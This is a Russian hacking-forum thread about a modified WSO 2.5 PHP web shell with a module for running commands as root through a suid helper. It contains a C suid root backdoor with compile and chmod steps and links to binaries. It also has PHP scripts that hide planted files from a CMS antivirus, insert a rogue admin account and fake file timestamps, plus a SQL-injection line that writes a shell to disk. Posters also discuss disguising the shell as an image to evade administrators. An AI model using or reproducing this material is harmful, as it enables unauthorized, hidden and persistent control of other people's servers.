WSO 2.5 Suid Modified​Небезизвестный шелл WSO с добавлением модуля для работы с Suid'никами.

Модификация изначально писалась под собственные нужды, но решил её выложить, так как данная модификация может пригодиться другим пользователям.

На данный момент большинство пользуется этой наработкой: http://cyberguru007.blogspot.com/2011/07/wso.html

Но в ней очень много больших минусов .

Модификация:


Шелл находиться исключительно в одном файле, не требуется создание нескольких файлов.

Путь к Suid'нику и пароль к нему не прописан в файле - его можно указать прямо в шелле и менять не модифицируя исходный код.

Вся необходимая информация храниться в COOKIE, при просмотре коде невозможно определить местоположение суидника.

Шелл защищён паролем - после ввода пароля вы получаете обычный доступ, суидник нужно указать отдельно.

Исправлены глюки при Upload'е, изменении настроек - теперь можно загружать файлы, менять кодировку, AJAX режим можно не переключаюсь к обычной работе.

Присутствует возможность проверки работоспособности суидника до подключения шелла.

Передача данных происходит через встроенную функцию wsoEx.


Скрин:

http://i045.radikal.ru/1108/75/cbbac301dabd.png

http://s51.radikal.ru/i132/1108/30/85c6f414daa8.png

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.

Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Код в аттаче (https://forum.antichat.net/attachment.php?attachmentid=1727&stc=1) . Модификация писалась для личного использования, что возможны глюки.

Пароль - root.

Сделай еще в запакованном виде

имхо и без этого можно было обойтись, просто немного модифицируя wsoEx

хотя, посмотрим..

любой труд нужно оценить

Скачать запакованную версию: http://zalil.ru/31520955

Если кому то нужно добавить ещё некоторые возможности - пишите, сделаю.

UDP:

Под рукой нет винды

сделай поддержку WIN

вкладку, где элементарным нажатием клавиши, можно было создать админа с правами на удаленное подключение.

кнопку на скачивание SAM файла

и т.п. для ВЫНей.

чтобы уже совсем облениться и не писать вручную net user /ADD =)))))))

отправка GET/POST запросов, с поправкой хидера

реализовать думаю лучше через сокеты, не везде есть курл

как суидник добавлять?

В меню ссылка - Suid.
Konqi , только вот зачем?


Например DDOS из армии шеллов)))

А так вещь вообще действительно полезная, например для анонимной работы с дырами на других сайтах и тд...

я вот тока заметил

а что означает слово Modificed?

есть слова Modified, и Modificated

а вот чо значит modificed, я не понял

Дополню: Шелл должен иметь как можно больше возможностей, и в тоже время иметь компактный размер. добавлять всё что не попадает под эту категорию не надо.

Всё что считаю нужным добавлю как будет время.

Тема перенесена в Уязвимости по моей просьбе.

rushter said:
Вот мне не хватает кнопочки которая делает тач шелла с датой соседнего файла и так же тачит папку в которой он лежит.
У самого как то руки всё не доходят, полезная штука


Я делал это. Выложу свой вариант, может пригодится. Шелл тачит себя датой изменения соседнего файла, а если файла нету, то датой изменения соседней директории. Потом находит в директории шелла время модификации, которое произошло максимально недавно, и тачит директорию этой датой.

Только это сделано в оригинальном WSO 2.5, а не в модификации из первого поста.


Code:
http://www.sendspace.com/file/ik9e02

Запускается нажатием на Magic Touch в менюшке, сам код лежит в функции actionMagicTouch.

rushter said:
Спасибо, то что надо.
Чем запакован стандартный wso ?



[PHP]
PHP:
[COLOR="#0000BB"]';

$content=php_strip_whitespace('in.txt');

$content=trim(preg_replace([COLOR="#DD0000"]'/

При использовании Suid на FreeBSP возникает ошибка Query did not return anything

Так же при скачивании файлов с данной модификации, так же возникают ошибки

Falknat said:
При использовании Suid на FreeBSP возникает ошибка Query did not return anything
Так же при скачивании файлов с данной модификации, так же возникают ошибки


Query did not return anything - Эта ошибка возникает когда функции system, exec(Добавил, поскольку раньше в таком случае ничего не возвращалось)... Запрещены или ничего не возвращают. Проверьте, работают ли они.

Если да - будем разбираться.

Они работают, но всё ровно возникает ошибка при использовании Suid.

из phpinfo видно что работают:

Disabled PHP Functions: none

http://i037.radikal.ru/1108/45/344f4e9f4af8.jpg

После нажатия на кнопку YES, вылетает эта ошибка

Возможно не найден php интерпретатор, попробуй выполнить в консоли:


/usr/sbin/ups asd "php /Путь/К/Любому/php/скрнипту/"


Работать будет/не будет - Пиши в ПМ.

А у вас есть ICQ или какой либо контакт? За доработку скрипта готов буду заплатить...

Falknat said:
А у вас есть ICQ или какой либо контакт? За доработку скрипта готов буду заплатить...


Платно не работаю. Доработанный скрипт прикрепил в первом посте. Теперь существует возможность указать путь к php интерпретатору.

Выложили бы сам суидник еще.

попугай said:
Выложили бы сам суидник еще.




Code:
#include
#include
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"cool_hack") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}

Using: ./suid cool_hack id

[path] [password] [command]

Пароль, разумеется можно изменить. В сурсе видно где

Скомпилируй (хоть на том же шелле с gcc) и используй.

Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).

P.S.:

Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451

расскажите нубу, вообще для чего это добавление

что оно дает? :d

Excellent18 said:
расскажите нубу, вообще для чего это добавление
что оно дает? :d


Установленный suid-бит позволяет выполнять файл от имени владельца файла, а не текущего юзера. Т.е. если дать суиднику права root'a, то можно будет выполнять команды от имени root'a с любого юзера.

Ну и следовательно модификация, чтобы более удобно использовать суидник (сохраняя графическую оболочку web-shell'a), а не просто выполнение команд.


1NtR0 said:
WSO не правильно работают на вин ОС, лучше бы это поправили.


На вин все неправильно работает

WSO не правильно работают на вин ОС, лучше бы это поправили.

Tigger said:

Code:
#include
#include
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"cool_hack") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}

Using: ./suid cool_hack id
[path] [password] [command]
Пароль, разумеется можно изменить. В сурсе видно где
Скомпилируй (хоть на том же шелле с gcc) и используй.
Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).
P.S.:
Скомпилированный суидник
с паролем 112s233
: http://rghost.ru/19777451



Спасибо, сейчас скомпилил, залив на ftp одного сайта(владелец user), сделал chmod 4755, зашел через вебшелл(права apache) - попробовал выполнить суидник - права показываются как апачевские.

Естественно, предварительно я посмотрел в /etc/passwd какие uid и gid у юзверя моего ftp, которые я вписал вместо рутовских нулей.

Почему так?


1NtR0 said:
WSO не правильно работают на вин ОС, лучше бы это поправили.



Что именно?

попугай said:
Что именно?


На вин права не правильно отображаються, а именно функция:


PHP:
functionwsoPermsColor($f) {

if (!@is_readable($f))

return''.wsoPerms(@fileperms($f))� �.'';

elseif (!@is_writable($f))

return''.wsoPerms(@fileperms($f))� �.'';

else

return''.wsoPerms(@fileperms($f))� �.'';

}



Багфикс при котором работает правильно


PHP:
functionwsoPermsColor($f) {

if(is_dir($f)) {

if($GLOBALS['os'] =='nix'){

if(is_writeable($f)) {

return''.wsoPerms( @fileperms($f)) .'';

}elseif(is_readable($f)){

return''.wsoPerms( @fileperms($f)) .'';

} else return''.ws oPerms(@fileperms($f)) .'';

} else {

$tmp=$f.'/.ssps_tmp';

if(@touch($tmp)){

unlink($tmp);

return''.wsoPerms(@fileper ms($f)) .'';

}elseif(opendir($f)){

closedir();

return''.wsoPerms(@fileper ms($f)) .''; }

else return''.wsoPerms(@fileperms ($f)) .'';

}

}

else {

if($fp= @fopen($f,'a')) return'' .wsoPerms(@fileperms($f)) .'';

elseif($fp= @fopen($f,'r')) retu rn''.wsoPerms(@fileperms($f)) .'';

return''.wsoPerms(@fileperms($f)) .'';;

}

}

http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg

вот тут у меня юзер

antidonat

а с помощью этого можно сделать другой типа и посмотреть закрытые разделы?

если не с помощью этого. то как?

Excellent18 said:
http://www.keep2.me/files/e4b18a2e046706d5e6e8c14f238b05e4/23.11.15-30.08-1278x260.jpg
вот тут у меня юзер
antidonat
а с помощью этого можно сделать другой типа и посмотреть закрытые разделы?
если не с помощью этого. то как?


Если прорутать, то да.

Query did not return anything


не могу найти php интепритатор (( помогите плз как его найти ( freebsd 7.0

Смотрим вывод ps aux - Вообще безпалива!!1

А так в принципе норм...

Подскажите пожалуйста. Я использую шел (из первого поста ) + этот (http://rghost.ru/19777451) суидник ( пост 20 (https://antichat.live/showpost.php/p/2811546/postcount/20/) ( Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451 ) )...

Но у меня не получается зайти по рутом, я почему - то захожу под 33 ( www-data ) Group: 33 ( www-data ).

Подскажите, в чём проблема?

P.S. Ввожу так:

Suid: ./suid

Password: 112s233

Php: /usr/bin/php

noga said:
Подскажите пожалуйста. Я использую шел (из первого поста ) +
этот (http://rghost.ru/19777451)
суидник ( пост
20 (https://antichat.live/showpost.php/p/2811546/postcount/20/)
( Скомпилированный суидник с паролем 112s233: http://rghost.ru/19777451 ) )...
Но у меня не получается зайти по рутом, я почему - то захожу под 33 ( www-data ) Group: 33 ( www-data ).
Подскажите, в чём проблема?
P.S. Ввожу так:
Suid: ./suid
Password: 112s233
Php: /usr/bin/php


На суидник необходимо установить suid bit.

XAMEHA said:
На суидник необходимо установить suid bit.


Установлено: 4751

И ничего не выходит большинство команд не срабатывает, директорий не открывается ;(

В первом посте выложена версия в которой невозможно указать путь к PHP. Если это важно выложите версию где это можно зделать.

Php: /usr/bin/php

а без этого у меня ошибка вылезает: Query did not return anything

Are you sure you want to save changes?

делаю вот так:

Suid: ./suid

Password: 112s233

что неправильно?

или насколько я понимаю что не везде можно получить root шелл?

поиск пути до интерпретатора php в шелле:

whereis php

не могу пробить

объясните пож. все сделал нормально нажал чудо кнопку и:

http://imglink.ru/pictures/04-10-11/538f4dd85108541e6cb83ab6bd35a904.jpg (http://imglink.ru)

это значить не пробить.(уже штук на 6 сайтах пробовал

то же самое )

vasykas said:
объясните пож. все сделал нормально нажал чудо кнопку и:
http://imglink.ru/pictures/04-10-11/538f4dd85108541e6cb83ab6bd35a904.jpg (http://imglink.ru)
это значить не пробить.(уже штук на 6 сайтах пробовал
то же самое
)


Кого не пробить ?

Что у тебя за "./" в первой строке ? это тебе что консоль ?

в первой строке указуется полный серверный путь к суидному файлу...

Пример:

/tmp/suid

P.S. в 20-м посте этой темы, Tigger показал как использовать суидный файл в консоли шела.

noga said:
Установлено: 4751
И ничего не выходит большинство команд не срабатывает, директорий не открывается ;(


Помимо суидного бита нужно что бы у файла овнер был root. Иначе толк от суидника никакой)))

При попытке редактировать файл, часто пишет.

Соединение было сброшено....

или выкидывает на каталог с файлами а файл не сохраняет.

КАкой пасс для входа в шелл?

penguen said:
КАкой пасс для входа в шелл?


root

Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна.

Добавлена опция дампа определенных колонок таблиц.

Скриншот:

http://savepic.su/641808.jpg

Код на pastebin.com: http://pastebin.com/WvZTc46s

В WSO из первого поста есть ошибка в параметрах:



var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var
p1_
= '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var
p1_
= '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';


Правьте)

Готовый запакованный вариант: http://pastebin.com/7fn3hebC

Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов..

Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени..

Прячем файлы от встроенного антивируса:


PHP:
//AV hide

$antivir='../ajax/antivirus.php';

$time_create=filemtime($antivir);

$text=file_get_contents($antivir);

$file=fopen($antivir,'w');

$text=str_replace('"./engine/inc/search.php",','"./engine/inc/search.php",

"./engine/ajax/view.php",',$text);

fwrite($file,$text);

fclose($file);

$res=touch($antivir,$time_create);

echo"AV - ok :)";

// end //

Создаём админа


PHP:
//adm

ob_start();

define("DATALIFEENGINE","1");

include("../classes/mysql.class.php");

include("dbconfig.php");

include("config.php");

mysql_connect(DBHOST,DBUSER,DBPASS);

mysql_select_db(DBNAME);

@set_time_limit(0);

$update=mysql_query("INSERT INTO `".PREFIX."_users` ( `email` , `password` , `name`, `u ser_group` ) VALUES ('my@mail.com', '14e1b600b 1fd579f47433b88e8d85291', 'adm', '1')");

echo"adm in DB - ok :)";

// end //

и много других...

Как все эти скрипты реализовать в одном?

Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д.

Если произошла ошибка - останавливаем и выводим на экран..

Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно...

spiderbuber said:
Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов..
Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени..
Прячем файлы от встроенного антивируса:

PHP:
//AV hide

$antivir='../ajax/antivirus.php';

$time_create=filemtime($antivir);

$text=file_get_contents($antivir);

$file=fopen($antivir,'w');

$text=str_replace('"./engine/inc/search.php",','"./engine/inc/search.php",

"./engine/ajax/view.php",',$text);

fwrite($file,$text);

fclose($file);

$res=touch($antivir,$time_create);

echo"AV - ok :)";

// end //

Создаём админа

PHP:
//adm

ob_start();

define("DATALIFEENGINE","1");

include("../classes/mysql.class.php");

include("dbconfig.php");

include("config.php");

mysql_connect(DBHOST,DBUSER,DBPASS);

mysql_select_db(DBNAME);

@set_time_limit(0);

$update=mysql_query("INSERT INTO `".PREFIX."_users` ( `email` , `password` , `name`, `u ser_group` ) VALUES ('my@mail.com', '14e1b600b 1fd579f47433b88e8d85291', 'adm', '1')");

echo"adm in DB - ok :)";

// end //

и много других...
Как все эти скрипты реализовать в одном?
Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д.
Если произошла ошибка - останавливаем и выводим на экран..
Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно...


Может, это сойдёт?


PHP:
functionDLE()

{

...

}

if(DLE())

{

echo"ok";

}

else{

echo"Fffuu";

}

Классный шелл!

Заливаю только этот шелл так как другие далеко позади!

Как сделать дамп БД через этот шелл?

как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите

ссылка сдохла!

скиньте ещё раз Скомпилированный суидник плз!

и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!

в чём может быть проблемма?

Faaax said:
ссылка сдохла!
скиньте ещё раз Скомпилированный суидник плз!
и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?


Самому не скомпилить чтоли?

1) Просто суидник: http://www.sendspace.com/file/hgwwez

2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj

Пасс на судник: 112s233

Использование: ./suid 112s233 'uname -a; id'

да уже скомпилил!

но вот следующий вопрос остаётся открытым!

после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!

в чём может быть проблемма?

серв до сих пор лежит!

глючный какой-то мод, сохранил suid, теперь на шелл не заходит:

Query did not return anything

1NtR0 said:
глючный какой-то мод, сохранил suid, теперь на шелл не заходит:
Query did not return anything


адрес пхп неверно указал

Друзья, объясните дураку смысл не root суидника ?

vobbs said:
Друзья, объясните дураку смысл не root суидника ?


Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, - root

А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)

Человеки добрые, подскажите в чём дело:

На ломе прекрасно открывается данный шел из этой темы, только не работают Actions.

Но не открывается вообще шел без модификации этой ( /thread103155-wso.html ) пишет про ошибку:

"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595

Osstudio said:
Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami,
- root
А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)


Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.

edger said:
Человеки добрые, подскажите в чём дело:
На ломе прекрасно открывается данный шел из этой темы, только не работают Actions.
Но не открывается вообще шел без модификации этой ( /thread103155-wso.html ) пишет про ошибку:
"Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595


Стоит скоба там, где ее не должно стоять. А именно в 595 строке. Исправь

vobbs said:
Стоит скоба там, где ее не должно стоять. А именно в 595 строке. Исправь


В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю

vobbs said:
Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.


Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...

vobbs said:
Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.



Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).

Osstudio said:
Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...


Зачем его заливать в bin ?

попугай, я хочу рута получить имея права обычного пользователя или ноубоди, конечно же =)

vobbs said:
попугай, я хочу рута получить имея права обычного пользователя или ноубоди, конечно же =)



Тебе тогда в другую тему для начала - /thread296327.html

Суидник нужен, если у тебя уже есть рут-доступ.

vobbs said:
Зачем его заливать в bin ?


Залей в tmp, может тебе так больше понравиться

Главное ещё, чтобы файл рутом был создан.... +s права всмысле..

скажите вопрос такой, залить шелл залил, пытаюсь править файл .htaccess не дает, пишет правка запрещена, пытался поправить конфиг или изменить права доступа тоже не дает, что можно еще попробовать? шеллом как то поменять файл .htaccess кроме простого способа есть шанс??? или может как то изменить права на конфиг?

Почему дамп БД не пашет? или только у меня так?

OxoTnik said:
Почему дамп БД не пашет? или только у меня так?


Только у тебя.

после редактирования файлов выдает


Code:
Query did not return anything

из-за чего это?

и да, изменения не сохраняются.

Зарегил домен hut4.ru на сайте holm.ru , залил к себе на сайт wso , и теперь я могу видеть абсолютно все сайты зарегистрированые на hut4.ru + login (вроде больше ничего не могу делать). Это недоработки сервера или это нормально? Я новичок и не знаю , просто интересно что это значит? Заранее спасибо за ответ.

ну просмотр файлов, я думаю, тебе недоступен

это нормально

OxoTnik said:
Почему дамп БД не пашет? или только у меня так?


А ты при дампе укажи в названии файла диру куда надо дамп положить, например

/tmp/wso-22323.zip


Зарегил домен hut4.ru на сайте holm.ru , залил к себе на сайт wso , и теперь я могу видеть абсолютно все сайты зарегистрированые на hut4.ru + login (вроде больше ничего не могу делать). Это недоработки сервера или это нормально? Я новичок и не знаю , просто интересно что это значит? Заранее спасибо за ответ.


Абсолютно нормальная ситуация, не нормально, если при этом ядро старое и дырявое)

Тыц

Было бы неплохо доработать шелл, или выпустить альтернативную версию чтобы параметры передавались не постом а через СOOKIE, думаю на JavaScript пару минут скриптик написать чтобы при клике вызывалась функция с параметрами, которая установит новое значение куки и обновит страницу чтобы они передались.

P.S. плюсов от этого будет много) к примеру шелл замаскирован под картинку, и в логах админ в 2 счета поймет что Запись вида "POST /images/lalala.jpg" выглядит подозрительной))

можно даже обратно передавать данные через Set-Cookie:,

и тогда не будет меняться размер файла при выдаче, т.к. если подряд идет обращение к одной картинке, у которой в логах каждый раз новый размер тоже вызывает подозрения)) думаю лучше всего если выпустить просто альтернативную версию аля "Cookie Edition", в которой будут только основные функции, которые можно реализовать через куки (само собой файлы заливать через куки не катит)))

P.S. Надеюсь меня услышат, спасибо)

Бредовый метод. Мне кажется что в r57 лучше поправить функцию ex (добавить ./suid) и юзать на здоровье. Потому как там список файлов через ls -lua выводится.

При работе через suid-файл есть проблемы с редактированием файлов, размер которых > ~5 Кб. Выводится чистая страница с "Query did not return anything". Это как-нибудь фиксится?

Пытаюсь залить через скул, вбиваю запрос


Code:
union select '' into outfile '/var/www/htdocs/404.php'

Захожу на http://www.victim.com/404.php, мне вылезает 404. Куда он девается?

Господ ТС, интересует следующий вопрос:

был ли исправлен баг при базе данных с таблицами, содержащими пробелы в имени?

В оригинальном ВСО sql браузер просто фейлит конкретно, если такие таблицы присутствуют...

Проблема в передачe count(*), нужно брать имена таблиц в кавычки при обращении select .. from 'table name'...

roflzi said:
Господ ТС, интересует следующий вопрос:
был ли исправлен баг при базе данных с таблицами, содержащими пробелы в имени?
В оригинальном ВСО sql браузер просто фейлит конкретно, если такие таблицы присутствуют...
Проблема в передачe count(*), нужно брать имена таблиц в кавычки при обращении select .. from 'table name'...


Попробуй PAS как альтернативу... В WSO не сталкмвался с таким багом...

Дорогой элито-бир, величайший автор рдп брут PRIV8 (здравствуй, давно не виделись)

1) В данном топике я хотел бы обсудить конкретно WSO, а не нечто другое (PAS в данный момент меня не интересует, я знаю что это).

2) Меня не особо интересует что ты не встречался с данным вопросом, т.к. просто руки не доходили или ещё почему либо, в то время как баг присутствует и я предлагаю его фикс.

По-этому прошу не офтопить, хотя бы потому, что мой конкретный вопрос был адресован к ТС.

Спасибо

Можно инструкцию по поводу "Suid" в WSO?

зачем нужен wso2_pack.php в архиве?

Sat-hacker said:
зачем нужен wso2_pack.php в архиве?


Он более мелкого размера.

Это на случай обхода ограничения на объём загружаемого файла. - Можно закосить под "картинку" ну или ещё что-то что требуется...

беда, подключивает шелл, где мануал найти чтоб обычный заработал через суид?wrapper.php,wso_root.php - в данный момент использую вот это, но тоже закачка например не работает) и т.д.

dean999 said:
беда, подключивает шелл, где мануал найти чтоб обычный заработал через суид?


Вот хороший мануал php.net, мануальтесь на здоровье.

n4yk said:
Было бы неплохо доработать шелл, или выпустить альтернативную версию чтобы параметры передавались не постом а через СOOKIE, думаю на JavaScript пару минут скриптик написать чтобы при клике вызывалась функция с параметрами, которая установит новое значение куки и обновит страницу чтобы они передались.
P.S. плюсов от этого будет много) к примеру шелл замаскирован под картинку, и в логах админ в 2 счета поймет что Запись вида "POST /images/lalala.jpg" выглядит подозрительной))
можно даже обратно передавать данные через Set-Cookie:,
и тогда не будет меняться размер файла при выдаче, т.к. если подряд идет обращение к одной картинке, у которой в логах каждый раз новый размер тоже вызывает подозрения)) думаю лучше всего если выпустить просто альтернативную версию аля "Cookie Edition", в которой будут только основные функции, которые можно реализовать через куки (само собой файлы заливать через куки не катит)))
P.S. Надеюсь меня услышат, спасибо)


Я разрабатывал такой в своё время, в публику не выкладывал, только для своих. Но там была фишка в том - что куки ограниченного размера могут быть, и поэтому там надо было целую систему "многокуковой" (типо если не помещается, то надо делить искомое на части....) передачи данных делать...

Кто знает как в WSO закачать все отмеченные файлы либо файлы по списку?

RaWaS said:
Кто знает как в WSO закачать все отмеченные файлы либо файлы по списку?


С самого начала непонятно, закачать или скачать?

Если закачать(а так именно и написано) то про какой список имеется ввиду, или про отмеченные - ГДЕ?

Но думаю имеется ввиду СКАЧАТЬ, то без упаковки никак.

Подскажите, плиз, этот шелл без привязки СУИДфайла может полноценно работать?

Пока не поставил суидник, через это шелл закачал бекконнеткт, хочу переименовать - при нажатии кнопки первый раз перебросило меня в домашнюю директорию шелла. Целевой файл не переименовался. Попробовал в целевом файле изменить код - то же самое, пребрасывает в домашнюю диру, содержимое целевого файла не изменяется. Обычный WSO работает без проблем.

UPD

То же самое происходит и при привязке суидника. Рутовые файлы вроде бы можно редактить. но при сохранении перебрасывает в домашнюю диру, изменения не сохраняются.

2UPD

Посмотрел в адресную строку браузера - офигел:


Code:
wso2.php?text=User-agent%3A+*%0D%0ADisallow%3A+%2Fadmin_new%2F%0D%0AD isallow%3A+%2Fadmin%2..........

3UPD

Ошибка в яваскрипте. Вместо параметра var p2_ дублировался p1_ Решено.

Решилось что то с :


Query did not return anything


?

Возникает при активном суиднике и редактировании файла больше ~20кБ

Если файл меньший - то все ОК. Приходится юзать 2 шелла. Обычный и этот. Этим изменяю права. Обычным - редактирую файло.

Make file: (Writeable)

-(Writable)

блеать не удержался сори,но напиши в сорцах по грамотному тогда,если это задевает(***ню начинаете писать)

Faaax said:
блеать не удержался сори,но напиши в сорцах по грамотному тогда,если это задевает(***ню начинаете писать)


Да ладно не расстраивайся

WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...

Vip77 said:
WSO 2.5 Modified багнутый какой-то... На пример пытаюсь изменить дату, жму ок - ниче не пишет и переходит в каталог с файлами, смотрю, а дата таже стоит...


Права-то на запись имеются?

herfleisch said:
Права-то на запись имеются?


Конечно, попробовал изменить дату с wso 2.4 все спокойно меняется

Если бы не было прав, то писало бы Fail! а так вообще ничего не пишет, а перекидывает в файловый менеджер и в адресной строке - shell.php?touch=2012-12-01 14:22:54

Изменить имя файла тоже не получается... просто прописывается в адресной строке

shell.php?name=измененноеимя.php

Пытаюсь изменить содержимое файла - не изменяется в адресной строке - shell.php?text=blablabla

Неужели только у меня такое...

Vip77 said:
Неужели только у меня такое...


А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.

tmp said:
А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.


Файлы редактировать через этот шелл не могу. А права есть. И где там ошибка в яваскрипте не знаю... Как выложили так и юзал.

Строки 231 и 232


Code:
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';


поменяй строку 232

на


Code:
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

var p2_ должно быть

ЗЫ

Но проблему с редактированием файлов больше 20 кБ так и не решил

tmp said:
Строки 231 и 232

Code:
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p1_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

поменяй строку 232
на

Code:
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';

var p2_
должно быть
ЗЫ
Но проблему с редактированием файлов больше 20 кБ так и не решил


О спасибо, этим решилось много проблем

tmp said:
А файлы редактировать можешь? Исправлял в исходнике яваскрипт? Там ошибка, в оригинальном файле.


Проблема в том, что к suid'нику передается сильно длинный параметр. И запрос выдает "Argument list too long".

Решение которое пришло первым в голову (на сколько стабильно работает не знаю):


PHP:

diff--git a/var/www/orig.php b/var/www/mod.php

index eb36bb8..0aebf2c 100644

---a/var/www/orig.php

+++b/var/www/mod.php

@@ -104,6+104,13@@ if(get_magic_quotes_gpc()) {





if (!empty($_COOKIE[md5($_SERVER['HTTP_HOST']).'sname']) && !empty($_COOKIE[md5($_SERVER['HTTP_HOST']).'spass']) &&$_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'] !=''&& !defined('suid')) {

+if($_POST['p2'] =='edit'&& !empty($_POST['p3'])){

+$tmp_path='/tmp/'.str_shuffle('0123456789abcdefghijklmnopqrstuvwxy z');

+

+file_put_contents($tmp_path,$_POST['p3']) or die('/tmp/ isn\'t writable.');

+

+$_POST['p3'] =$tmp_path;

+}



echowsoEx($_COOKIE[md5($_SERVER['HTTP_HOST']).'sname'].' '.$_COOKIE[md5($_SERVER['HTTP_HOST']).'spass'].' "'.$_COOKIE[md5($_SERVER['HTTP_HOST']).'sphp'].' '.$_SERVER['SCRIPT_FILENAME'].' \''.addslashes($_COOKIE[md5($_SERVER['HTTP_HOST'])]).'\' '.'\''.base64_encode(serialize($GLOBALS)) .'\'"');



@@ -963,13+970,14@@ functionactionFilesTools() {

echo'File isn\' t writeable';

break;

}

+

if( !empty($_POST['p3']) ) {

$time= @filemtime($_POST['p1']);

-$_POST['p3'] =substr($_POST['p3'],1);

$fp= @fopen($_POST['p1'],"w");

if($fp) {

- @fwrite($f p,$_POST['p3']);

+ @fwrite($ fp,substr((defined('suid') ?file_get_contents($_P OST['p3']) :$_POST['p3']),1));

@fclose( $fp);

+ if(define d('suid')) @unlink($_POST['p3']);

echo'Sav ed!
p3_="";';

@touch($ _POST['p1'],$time,$time);

}



https://gist.github.com/c52be259912a3123b2f1

Естественно нужны права на запись в /tmp/, можно было и иначе, просто переносить из /tmp/ используя mv, но делать лень.

Еще как вариант можно разделять запросы на части, но это будет сильно затратно в плане выделения памяти.

Jer1cho said:
Проблема в том, что к suid'нику передается сильно длинный параметр. И запрос выдает "Argument list too long".
Решение которое пришло первым в голову (на сколько стабильно работает не знаю):
.


Попробую поюзать! Сенкс

Кто знает как открыть дам wso dump.sql в sqlite? Или чем нибудь удобным для чтения, кроме notepad и mysql сервера?

